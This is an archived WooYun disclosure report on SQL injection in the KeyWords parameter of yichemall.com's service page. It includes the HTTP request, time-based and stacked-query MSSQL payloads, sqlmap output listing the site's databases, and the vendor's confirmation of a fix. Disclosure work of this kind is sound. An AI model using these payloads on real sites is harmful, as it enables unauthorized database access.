乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-30: 细节已通知厂商并且等待厂商处理中 2015-03-30: 厂商已经确认,细节仅向厂商公开 2015-04-09: 细节向核心白帽子及相关领域专家公开 2015-04-19: 细节向普通白帽子公开 2015-04-29: 细节向实习白帽子公开 2015-05-14: 细节向公众公开
易车商场存在SQL注入 由于之前的修复不全造成的
问题处:http://www.yichemall.com/Service/index
KeyWords=
参数KeyWords存在注入(需登录)
POST /Service/index HTTP/1.1Host: www.yichemall.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: xxxx, xxxxxxxReferer: http://www.yichemall.com/Service/indexCookie: **********************************打码区******************************************************************************************************************Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 18KeyWords=%E2%80%98
Place: POSTParameter: KeyWords Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: KeyWords=%E2%80%98'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: KeyWords=%E2%80%98' WAITFOR DELAY '0:0:5'-----[07:56:23] [INFO] testing Microsoft SQL Server[07:56:23] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads[07:56:28] [INFO] confirming Microsoft SQL Server[07:56:44] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP.NET 4.0.30319, Nginxback-end DBMS: Microsoft SQL Server 2008[07:56:44] [INFO] fetching database names[07:56:44] [INFO] fetching number of databases[07:56:44] [INFO] retrieved: 3[07:57:01] [INFO] retrieved: master[07:59:05] [INFO] retrieved:[07:59:33] [ERROR] invalid character detected. retrying..[07:59:33] [WARNING] increasing time delay to 6 secondstempdb[08:02:18] [INFO] retrieved: yichemallorderavailable databases [3]:[*] master[*] tempdb[*] yichemallorder
加强过滤
危害等级:高
漏洞Rank:15
确认时间:2015-03-30 09:25
非常感谢对易车的帮助,我们尽快处理
2015-03-30:已经修复,非常感谢对易车的支持